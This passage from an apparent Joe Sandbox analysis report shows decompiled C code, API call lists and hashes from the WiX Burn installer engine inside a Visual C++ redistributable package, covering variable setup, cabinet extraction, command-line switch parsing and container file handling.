                                                                          				_v568 = L"SendToFolder";
                                                                          				_v556 = 0;
                                                                          				_v552 = 0;
                                                                          				_v548 = L"ServicePackLevel";
                                                                          				_v544 = E000167E5;
                                                                          				_v540 = 3;
                                                                          				_v536 = 0;
                                                                          				_v532 = 0;
                                                                          				_v528 = L"StartMenuFolder";
                                                                          				_v516 = 0;
                                                                          				_v512 = 0;
                                                                          				_v508 = L"StartupFolder";
                                                                          				_v500 = _t333;
                                                                          				_v496 = 0;
                                                                          				_v492 = 0;
                                                                          				_v488 = L"SystemFolder";
                                                                          				_v480 = 0;
                                                                          				_v476 = 0;
                                                                          				_v472 = 0;
                                                                          				_v468 = L"System64Folder";
                                                                          				_v460 = 1;
                                                                          				_v456 = 0;
                                                                          				_v452 = 0;
                                                                          				_v448 = L"SystemLanguageID";
                                                                          				_v444 = E00015D0D;
                                                                          				_v440 = 0;
                                                                          				_v436 = 0;
                                                                          				_v432 = 0;
                                                                          				_v428 = L"TempFolder";
                                                                          				_v424 = E00016644;
                                                                          				_v420 = 0;
                                                                          				_v416 = 0;
                                                                          				_v412 = 0;
                                                                          				_v408 = L"TemplateFolder";
                                                                          				_v404 = E00015EAB;
                                                                          				_v400 = 0x15;
                                                                          				_v396 = 0;
                                                                          				_v392 = 0;
                                                                          				_v284 = E00015EAB;
                                                                          				_v324 = E000167E5;
                                                                          				_v304 = E000167E5;
                                                                          				_t338 = E0001648B;
                                                                          				_v244 = E00016159;
                                                                          				_v164 = E00016159;
                                                                          				_v144 = E00016159;
                                                                          				_v388 = L"TerminalServer";
                                                                          				_v384 = E00016184;
                                                                          				_v380 = 0xd;
                                                                          				_v376 = 0;
                                                                          				_v372 = 0;
                                                                          				_v368 = L"UserLanguageID";
                                                                          				_v364 = E00015D3F;
                                                                          				_v360 = 0;
                                                                          				_v356 = 0;
                                                                          				_v352 = 0;
                                                                          				_v348 = L"VersionMsi";
                                                                          				_v344 = E0001671C;
                                                                          				_v340 = 0;
                                                                          				_v336 = 0;
                                                                          				_v332 = 0;
                                                                          				_v328 = L"VersionNT";
                                                                          				_v320 = 1;
                                                                          				_v316 = 0;
                                                                          				_v312 = 0;
                                                                          				_v308 = L"VersionNT64";
                                                                          				_v300 = _t346;
                                                                          				_v296 = 0;
                                                                          				_v292 = 0;
                                                                          				_v288 = L"WindowsFolder";
                                                                          				_v280 = 0x24;
                                                                          				_v276 = 0;
                                                                          				_v272 = 0;
                                                                          				_v268 = L"WindowsVolume";
                                                                          				_v264 = E000169B8;
                                                                          				_v260 = 0;
                                                                          				_v256 = 0;
                                                                          				_v252 = 0;
                                                                          				_v248 = L"WixBundleAction";
                                                                          				_v240 = 0;
                                                                          				_v236 = 0;
                                                                          				_v232 = 1;
                                                                          				_v228 = L"WixBundleExecutePackageCacheFolder";
                                                                          				_v224 = E0001648B;
                                                                          				_v220 = 0;
                                                                          				_v216 = 0;
                                                                          				_v212 = 1;
                                                                          				_v208 = L"WixBundleExecutePackageAction";
                                                                          				_v204 = E0001648B;
                                                                          				_v200 = 0;
                                                                          				_v196 = 0;
                                                                          				_v192 = 1;
                                                                          				_v188 = L"WixBundleForcedRestartPackage";
                                                                          				_v184 = E0001648B;
                                                                          				_v180 = 0;
                                                                          				_v176 = 1;
                                                                          				_v172 = 1;
                                                                          				_v168 = L"WixBundleInstalled";
                                                                          				_v160 = 0;
                                                                          				_v156 = 0;
                                                                          				_v152 = 1;
                                                                          				_v148 = L"WixBundleElevated";
                                                                          				_v140 = 0;
                                                                          				_v136 = 0;
                                                                          				_v132 = 1;
                                                                          				_v128 = L"WixBundleActiveParent";
                                                                          				_v124 = E0001648B;
                                                                          				_v120 = 0;
                                                                          				_v116 = 0;
                                                                          				_v112 = 1;
                                                                          				_v108 = L"WixBundleProviderKey";
                                                                          				_v104 = E0001648B;
                                                                          				_v100 = 0x5b524;
                                                                          				_v96 = 0;
                                                                          				_v92 = 1;
                                                                          				_v88 = L"WixBundleSourceProcessPath";
                                                                          				_v84 = E0001648B;
                                                                          				_v80 = 0;
                                                                          				_v76 = 0;
                                                                          				_t347 =  &_v1216;
                                                                          				_v72 = 1;
                                                                          				_v68 = L"WixBundleSourceProcessFolder";
                                                                          				_v64 = E0001648B;
                                                                          				_v60 = 0;
                                                                          				_v56 = 0;
                                                                          				_v52 = 1;
                                                                          				_v48 = L"WixBundleTag";
                                                                          				_v44 = E0001648B;
                                                                          				_v40 = 0x5b524;
                                                                          				_v36 = 0;
                                                                          				_v32 = 1;
                                                                          				_v28 = L"WixBundleVersion";
                                                                          				_v24 = E000166F1;
                                                                          				_v20 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 1;
                                                                          				while(1) {
                                                                          					_t328 = E00015530(_t338, _v1232,  *((intOrPtr*)(_t347 - 0xc)),  *((intOrPtr*)(_t347 - 8)),  *((intOrPtr*)(_t347 - 4)),  *_t347,  *((intOrPtr*)(_t347 + 4))); // executed
                                                                          					_t334 = _t328;
                                                                          					if(_t328 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t348 = _t348 + 1;
                                                                          					_t347 = _t347 + 0x14;
                                                                          					if(_t348 < 0x3d) {
                                                                          						continue;
                                                                          					} else {
                                                                          					}
                                                                          					L5:
                                                                          					return E0003DE36(_t334, _v8 ^ _t349, 1, _t347, _t348);
                                                                          				}
                                                                          				E0005012F(_t334, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t347 - 0xc)));
                                                                          				goto L5;
                                                                          			}
                                                                          0x00017672
                                                                          0x0001767c
                                                                          0x00017682
                                                                          0x00017688
                                                                          0x0001768e
                                                                          0x00017698
                                                                          0x0001769e
                                                                          0x000176a4
                                                                          0x000176aa
                                                                          0x000176b0
                                                                          0x000176ba
                                                                          0x000176c0
                                                                          0x000176c6
                                                                          0x000176cc
                                                                          0x000176d2
                                                                          0x000176dc
                                                                          0x000176e2
                                                                          0x000176ec
                                                                          0x000176f2
                                                                          0x000176f8
                                                                          0x00017702
                                                                          0x0001770c
                                                                          0x00017712
                                                                          0x00017718
                                                                          0x0001771e
                                                                          0x0001772a
                                                                          0x0001772d
                                                                          0x00017733
                                                                          0x00017739
                                                                          0x0001773c
                                                                          0x00017742
                                                                          0x00017745
                                                                          0x0001774b
                                                                          0x00017751
                                                                          0x00017757
                                                                          0x0001775d
                                                                          0x00017763
                                                                          0x00017769
                                                                          0x0001776f
                                                                          0x00017775
                                                                          0x00017776
                                                                          0x00017780
                                                                          0x00017786
                                                                          0x0001778c
                                                                          0x00017792
                                                                          0x0001779c
                                                                          0x000177a6
                                                                          0x000177ac
                                                                          0x000177b2
                                                                          0x000177bc
                                                                          0x000177c6
                                                                          0x000177cc
                                                                          0x000177d2
                                                                          0x000177d8
                                                                          0x000177e2
                                                                          0x000177ec
                                                                          0x000177f2
                                                                          0x000177f8
                                                                          0x00017802
                                                                          0x0001780c
                                                                          0x00017812
                                                                          0x00017818
                                                                          0x00017822
                                                                          0x00017828
                                                                          0x0001782e
                                                                          0x00017834
                                                                          0x0001783e
                                                                          0x00017844
                                                                          0x0001784a
                                                                          0x00017854
                                                                          0x0001785a
                                                                          0x00017860
                                                                          0x00017866
                                                                          0x00017870
                                                                          0x0001787a
                                                                          0x00017880
                                                                          0x00017886
                                                                          0x00017890
                                                                          0x00017896
                                                                          0x0001789c
                                                                          0x000178a2
                                                                          0x000178ac
                                                                          0x000178b6
                                                                          0x000178bc
                                                                          0x000178c2
                                                                          0x000178cc
                                                                          0x000178d2
                                                                          0x000178d8
                                                                          0x000178de
                                                                          0x000178e8
                                                                          0x000178f2
                                                                          0x000178f8
                                                                          0x000178fe
                                                                          0x00017904
                                                                          0x0001790e
                                                                          0x00017918
                                                                          0x0001791e
                                                                          0x00017924
                                                                          0x0001792a
                                                                          0x00017934
                                                                          0x0001793e
                                                                          0x00017948
                                                                          0x00017950
                                                                          0x00017951
                                                                          0x00017957
                                                                          0x0001795d
                                                                          0x00017968
                                                                          0x0001796e
                                                                          0x00017974
                                                                          0x0001797a
                                                                          0x00017985
                                                                          0x0001798f
                                                                          0x00017996
                                                                          0x000179a1
                                                                          0x000179a7
                                                                          0x000179b2
                                                                          0x000179b3
                                                                          0x000179b9
                                                                          0x000179c3
                                                                          0x000179cd
                                                                          0x000179d3
                                                                          0x000179d9
                                                                          0x000179e3
                                                                          0x000179ed
                                                                          0x000179f3
                                                                          0x000179f9
                                                                          0x00017a03
                                                                          0x00017a09
                                                                          0x00017a0f
                                                                          0x00017a19
                                                                          0x00017a1f
                                                                          0x00017a25
                                                                          0x00017a2b
                                                                          0x00017a35
                                                                          0x00017a3f
                                                                          0x00017a45
                                                                          0x00017a4b
                                                                          0x00017a51
                                                                          0x00017a5b
                                                                          0x00017a61
                                                                          0x00017a67
                                                                          0x00017a71
                                                                          0x00017a77
                                                                          0x00017a81
                                                                          0x00017a87
                                                                          0x00017a8d
                                                                          0x00017a97
                                                                          0x00017a9d
                                                                          0x00017aa3
                                                                          0x00017aad
                                                                          0x00017ab3
                                                                          0x00017ab9
                                                                          0x00017abf
                                                                          0x00017ac9
                                                                          0x00017acf
                                                                          0x00017ad5
                                                                          0x00017adb
                                                                          0x00017ae5
                                                                          0x00017aeb
                                                                          0x00017af1
                                                                          0x00017af7
                                                                          0x00017b01
                                                                          0x00017b0b
                                                                          0x00017b11
                                                                          0x00017b17
                                                                          0x00017b1d
                                                                          0x00017b27
                                                                          0x00017b31
                                                                          0x00017b37
                                                                          0x00017b3d
                                                                          0x00017b43
                                                                          0x00017b4d
                                                                          0x00017b53
                                                                          0x00017b5d
                                                                          0x00017b63
                                                                          0x00017b69
                                                                          0x00017b74
                                                                          0x00017b7a
                                                                          0x00017b80
                                                                          0x00017b85
                                                                          0x00017b8b
                                                                          0x00017b91
                                                                          0x00017b9c
                                                                          0x00017ba6
                                                                          0x00017bb0
                                                                          0x00017bba
                                                                          0x00017bc0
                                                                          0x00017bc6
                                                                          0x00017bd0
                                                                          0x00017bda
                                                                          0x00017be0
                                                                          0x00017be6
                                                                          0x00017bec
                                                                          0x00017bf6
                                                                          0x00017c00
                                                                          0x00017c06
                                                                          0x00017c0c
                                                                          0x00017c12
                                                                          0x00017c1c
                                                                          0x00017c22
                                                                          0x00017c28
                                                                          0x00017c2e
                                                                          0x00017c38
                                                                          0x00017c3e
                                                                          0x00017c44
                                                                          0x00017c4a
                                                                          0x00017c54
                                                                          0x00017c5e
                                                                          0x00017c64
                                                                          0x00017c6a
                                                                          0x00017c74
                                                                          0x00017c7e
                                                                          0x00017c84
                                                                          0x00017c8a
                                                                          0x00017c90
                                                                          0x00017c9a
                                                                          0x00017ca0
                                                                          0x00017ca6
                                                                          0x00017cac
                                                                          0x00017cb6
                                                                          0x00017cbc
                                                                          0x00017cc2
                                                                          0x00017cc8
                                                                          0x00017cce
                                                                          0x00017cd8
                                                                          0x00017cde
                                                                          0x00017ce4
                                                                          0x00017cea
                                                                          0x00017cf0
                                                                          0x00017cfa
                                                                          0x00017d00
                                                                          0x00017d06
                                                                          0x00017d0c
                                                                          0x00017d12
                                                                          0x00017d1c
                                                                          0x00017d22
                                                                          0x00017d28
                                                                          0x00017d2e
                                                                          0x00017d38
                                                                          0x00017d3e
                                                                          0x00017d44
                                                                          0x00017d47
                                                                          0x00017d4e
                                                                          0x00017d51
                                                                          0x00017d54
                                                                          0x00017d57
                                                                          0x00017d5a
                                                                          0x00017d61
                                                                          0x00017d64
                                                                          0x00017d67
                                                                          0x00017d6a
                                                                          0x00017d6d
                                                                          0x00017d74
                                                                          0x00017d77
                                                                          0x00017d7a
                                                                          0x00017d7d
                                                                          0x00017d83
                                                                          0x00017d86
                                                                          0x00017d8d
                                                                          0x00017d90
                                                                          0x00017d93
                                                                          0x00017d96
                                                                          0x00017d99
                                                                          0x00017da0
                                                                          0x00017da3
                                                                          0x00017da6
                                                                          0x00017da9
                                                                          0x00017dac
                                                                          0x00017db3
                                                                          0x00017dba
                                                                          0x00017dbd
                                                                          0x00017dc0
                                                                          0x00017dc3
                                                                          0x00017dd7
                                                                          0x00017ddc
                                                                          0x00017de0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017de2
                                                                          0x00017de3
                                                                          0x00017de9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00017deb
                                                                          0x00017dfe
                                                                          0x00017e10
                                                                          0x00017e10
                                                                          0x00017df6
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00027378,000152B5,00000000,0001533D), ref: 00017523
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection
                                                                          • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion
                                                                          • API String ID: 32694325-826827252
                                                                          • Opcode ID: 39762b779a8162d7c8d9ebabfacc4b7204146e5d3bc4a09e056d5c97b581e8df
                                                                          • Instruction ID: dcf21dc5ff895760df61de6aab3d68a12de7edb9a091ec9217db918dd34e646d
                                                                          • Opcode Fuzzy Hash: 39762b779a8162d7c8d9ebabfacc4b7204146e5d3bc4a09e056d5c97b581e8df
                                                                          • Instruction Fuzzy Hash: D13229B0C257798FDB65CF59C9887CDBAB8BB49B05F5081DAA50CA6210D7B50BC8CF84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          control_flow_graph 1533 30e43-30e6f CoInitializeEx 1534 30e83-30ece call 4f364 1533->1534 1535 30e71-30e7e call 5012f 1533->1535 1541 30ed0-30ef3 call 137d3 call 5012f 1534->1541 1542 30ef8-30f1a call 4f374 1534->1542 1540 310df-310f1 call 3de36 1535->1540 1557 310d8-310d9 CoUninitialize 1541->1557 1549 30fd3-30fde SetEvent 1542->1549 1550 30f20-30f28 1542->1550 1554 30fe0-31009 call 137d3 1549->1554 1555 3101b-31029 WaitForSingleObject 1549->1555 1552 310d0-310d3 call 4f384 1550->1552 1553 30f2e-30f34 1550->1553 1552->1557 1553->1552 1558 30f3a-30f42 1553->1558 1583 3100e-31016 call 5012f 1554->1583 1559 3105b-31066 ResetEvent 1555->1559 1560 3102b-31059 call 137d3 1555->1560 1557->1540 1562 30f44-30f46 1558->1562 1563 30fbb-30fce call 5012f 1558->1563 1564 3109b-310a1 1559->1564 1565 31068-31096 call 137d3 1559->1565 1560->1583 1569 30f58-30f5b 1562->1569 1570 30f48-30f56 1562->1570 1563->1552 1567 310a3-310a6 1564->1567 1568 310cb 1564->1568 1565->1583 1575 310c7-310c9 1567->1575 1576 310a8-310c2 call 137d3 1567->1576 1568->1552 1579 30fb5 1569->1579 1580 30f5d 1569->1580 1577 30fb7-30fb9 1570->1577 1575->1552 1576->1583 1577->1549 1577->1563 1579->1577 1586 30fa3-30fa8 1580->1586 1587 30f72-30f77 1580->1587 1588 30fb1-30fb3 1580->1588 1589 30f80-30f85 1580->1589 1590 30f87-30f8c 1580->1590 1591 30f95-30f9a 1580->1591 1592 30f64-30f69 1580->1592 1593 30f6b-30f70 1580->1593 1594 30faa-30faf 1580->1594 1595 30f79-30f7e 1580->1595 1596 30f8e-30f93 1580->1596 1597 30f9c-30fa1 1580->1597 1583->1552 1586->1563 1587->1563 1588->1563 1589->1563 1590->1563 1591->1563 1592->1563 1593->1563 1594->1563 1595->1563 1596->1563 1597->1563
                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 00030E65
                                                                          • CoUninitialize.OLE32 ref: 000310D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: <the>.cab$@Met$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 3442037557-3611498752
                                                                          • Opcode ID: bcd20306d7a3125bf9dc791cbfdb52cfe2d59f9ed8589d2c3d208a44d37cf483
                                                                          • Instruction ID: 4b9587b59a1d2feaab51743ac8573bdeb7fdc30482e0fc04819814a84402b06f
                                                                          • Opcode Fuzzy Hash: bcd20306d7a3125bf9dc791cbfdb52cfe2d59f9ed8589d2c3d208a44d37cf483
                                                                          • Instruction Fuzzy Hash: DF51AF36F45722EBD3322664CC55EEF759CDB45721F220235FD02BF680D6998C408AE6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 66%
                                                                          			E000141D2(void* __ecx, union _LARGE_INTEGER* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8) {
                                                                          				char _v8;
                                                                          				void* _t50;
                                                                          				int _t55;
                                                                          				WCHAR* _t56;
                                                                          				int _t62;
                                                                          				WCHAR* _t63;
                                                                          				signed int _t69;
                                                                          				intOrPtr* _t72;
                                                                          				signed int _t76;
                                                                          				struct _CRITICAL_SECTION* _t79;
                                                                          				signed int _t83;
                                                                          				void* _t89;
                                                                          				void* _t93;
                                                                          				union _LARGE_INTEGER* _t96;
                                                                          				struct _CRITICAL_SECTION* _t98;
                                                                          				void* _t100;
                                                                          				void* _t103;
                                                                          
                                                                          				_t96 = __edx;
                                                                          				_push(__ecx);
                                                                          				_a8 = _a8 | 0xffffffff;
                                                                          				_t98 = _a4;
                                                                          				_v8 = _a8;
                                                                          				 *(_t98 + 0x498) =  *(_t98 + 0x498) | 0xffffffff;
                                                                          				 *(_t98 + 0x494) = 1;
                                                                          				InitializeCriticalSection(_t98);
                                                                          				_t9 = _t98 + 0xd0; // 0xd0
                                                                          				InitializeCriticalSection(_t9);
                                                                          				_t10 = _t98 + 0x4a0; // 0x4a0
                                                                          				E00024B0E(_t10);
                                                                          				_t11 = _t98 + 0x4b8; // 0x4b8
                                                                          				E00024B0E(_t11);
                                                                          				_t83 = 0;
                                                                          				if( *((intOrPtr*)(_t98 + 0x4dc)) <= 0) {
                                                                          					L14:
                                                                          					_t40 = _t98 + 0x48; // 0x48
                                                                          					_t50 = E0001B389(_t96, _t40, _v8, _a8); // executed
                                                                          					_t103 = _t50;
                                                                          					if(_t103 < 0) {
                                                                          						_push("Failed to initialize engine section.");
                                                                          						_push(_t103);
                                                                          						E0005012F();
                                                                          					}
                                                                          					L16:
                                                                          					return _t103;
                                                                          				}
                                                                          				do {
                                                                          					if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)))) != 0x2d) {
                                                                          						goto L13;
                                                                          					}
                                                                          					_t55 = lstrlenW(L"burn.filehandle.attached");
                                                                          					_t56 = L"burn.filehandle.attached";
                                                                          					if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t56), _t56, _t55) != 2) {
                                                                          						L8:
                                                                          						_t62 = lstrlenW(L"burn.filehandle.self");
                                                                          						_t63 = L"burn.filehandle.self";
                                                                          						if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t63), _t63, _t62) != 2) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_t69 = lstrlenW(L"burn.filehandle.self");
                                                                          						_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t69 * 2;
                                                                          						_t89 = 0x3d;
                                                                          						_a4 = _t72;
                                                                          						if(_t89 !=  *((intOrPtr*)(_t72 - 2)) || 0 ==  *_t72) {
                                                                          							_t100 = 0x80070057;
                                                                          							E000137D3(_t72, "engine.cpp", 0x140, 0x80070057);
                                                                          							_push(L"burn.filehandle.self");
                                                                          							L19:
                                                                          							_push("Missing required parameter for switch: %ls");
                                                                          							_t103 = _t100;
                                                                          							_push(_t100);
                                                                          							goto L20;
                                                                          						} else {
                                                                          							_t103 = E000129DC( &_v8, _t96, _t72, 0,  &_v8);
                                                                          							if(_t103 < 0) {
                                                                          								L17:
                                                                          								_push(_a4);
                                                                          								_push("Failed to parse file handle: \'%ls\'");
                                                                          								_push(_t103);
                                                                          								L20:
                                                                          								E0005012F();
                                                                          								goto L16;
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          					}
                                                                          					_t76 = lstrlenW(L"burn.filehandle.attached");
                                                                          					_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t76 * 2;
                                                                          					_t93 = 0x3d;
                                                                          					_a4 = _t79;
                                                                          					if(_t93 !=  *((intOrPtr*)(_t79 - 2)) || 0 ==  *_t79) {
                                                                          						_t100 = 0x80070057;
                                                                          						E000137D3(_t79, "engine.cpp", 0x135, 0x80070057);
                                                                          						_push(L"burn.filehandle.attached");
                                                                          						goto L19;
                                                                          					} else {
                                                                          						_t103 = E000129DC( &_a8, _t96, _t79, 0,  &_a8);
                                                                          						if(_t103 < 0) {
                                                                          							goto L17;
                                                                          						}
                                                                          						goto L8;
                                                                          					}
                                                                          					L13:
                                                                          					_t83 = _t83 + 1;
                                                                          				} while (_t83 <  *((intOrPtr*)(_t98 + 0x4dc)));
                                                                          				goto L14;
                                                                          			}





















                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000141FE
                                                                          • InitializeCriticalSection.KERNEL32(000000D0,?,?,0001515E,?,?,00000000,?,?), ref: 00014207
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,0001515E,?,?,00000000,?,?), ref: 0001424D
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 00014257
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 0001426B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,0001515E,?,?,00000000,?,?), ref: 0001427B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,0001515E,?,?,00000000,?,?), ref: 000142CB
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000142D5
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,0001515E,?,?,00000000,?,?), ref: 000142E9
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,0001515E,?,?,00000000,?,?), ref: 000142F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                          • String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3039292287-3209860532
                                                                          • Opcode ID: 8cc4345c4b6cd08f8e6b328f4443c0d90c5e2f65bfa436c63b2d0316bbf02333
                                                                          • Instruction ID: 71dbf36eb5d5a04e38a938321b8a9dd4e7c7384007ddcf215a060068056d9697
                                                                          • Opcode Fuzzy Hash: 8cc4345c4b6cd08f8e6b328f4443c0d90c5e2f65bfa436c63b2d0316bbf02333
                                                                          • Instruction Fuzzy Hash: 0C51A571A40215BFD7249F69DC46FEBB768EB04761F400115FA28DB2A0DB70BA94C7A4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 54%
                                                                          			E0001C129(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
                                                                          				void* _t29;
                                                                          				int _t31;
                                                                          				union _LARGE_INTEGER* _t33;
                                                                          				int _t34;
                                                                          				long _t38;
                                                                          				signed short _t40;
                                                                          				signed short _t43;
                                                                          				void* _t47;
                                                                          				signed short _t48;
                                                                          				HANDLE* _t51;
                                                                          				intOrPtr _t52;
                                                                          				long _t55;
                                                                          				union _LARGE_INTEGER _t65;
                                                                          
                                                                          				_t52 = _a8;
                                                                          				_t51 = _a4;
                                                                          				_t51[6] =  *(_t52 + 4);
                                                                          				_t55 = 0;
                                                                          				_t65 = 0;
                                                                          				_t51[4] =  *(_t52 + 0x18);
                                                                          				_t51[5] =  *(_t52 + 0x1c);
                                                                          				_t51[2] =  *(_t52 + 0x40);
                                                                          				_t51[3] =  *(_t52 + 0x44);
                                                                          				if(_a12 != 0xffffffff) {
                                                                          					_t29 = GetCurrentProcess();
                                                                          					_t31 = DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2); // executed
                                                                          					if(_t31 != 0) {
                                                                          						_t65 = 0;
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t43 = GetLastError();
                                                                          						_t61 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          						_t55 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "container.cpp", 0xec, _t55);
                                                                          						_push(_a16);
                                                                          						_push("Failed to duplicate handle to container: %ls");
                                                                          						goto L3;
                                                                          					}
                                                                          				} else {
                                                                          					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
                                                                          					 *_t51 = _t47;
                                                                          					if(_t47 != 0xffffffff) {
                                                                          						L7:
                                                                          						if( *((intOrPtr*)(_a8 + 0xc)) == _t55) {
                                                                          							_t33 = _t55;
                                                                          						} else {
                                                                          							_t65 = _t51[2];
                                                                          							_t33 = _t51[3];
                                                                          						}
                                                                          						_push(_t55);
                                                                          						_t34 = SetFilePointerEx( *_t51, _t65, _t33, _t55); // executed
                                                                          						if(_t34 != 0) {
                                                                          							if(_t51[6] == 1) {
                                                                          								_t38 = E00031484(_t51, _a16); // executed
                                                                          								_t55 = _t38;
                                                                          								if(_t55 < 0) {
                                                                          									_push("Failed to open container.");
                                                                          									goto L15;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t40 = GetLastError();
                                                                          							_t58 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							_t55 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "container.cpp", 0xf8, _t55);
                                                                          							_push("Failed to move file pointer to container offset.");
                                                                          							L15:
                                                                          							_push(_t55);
                                                                          							E0005012F();
                                                                          						}
                                                                          					} else {
                                                                          						_t48 = GetLastError();
                                                                          						_t64 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						_t55 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "container.cpp", 0xe6, _t55);
                                                                          						_push(_a16);
                                                                          						_push("Failed to open file: %ls");
                                                                          						L3:
                                                                          						_push(_t55);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				return _t55;
                                                                          			}

















                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0001C319,000152FD,?,?,0001533D), ref: 0001C170
                                                                          • GetLastError.KERNEL32(?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?,00000000), ref: 0001C181
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0001C319,000152FD,?,?,0001533D,0001533D,00000000,?), ref: 0001C1D0
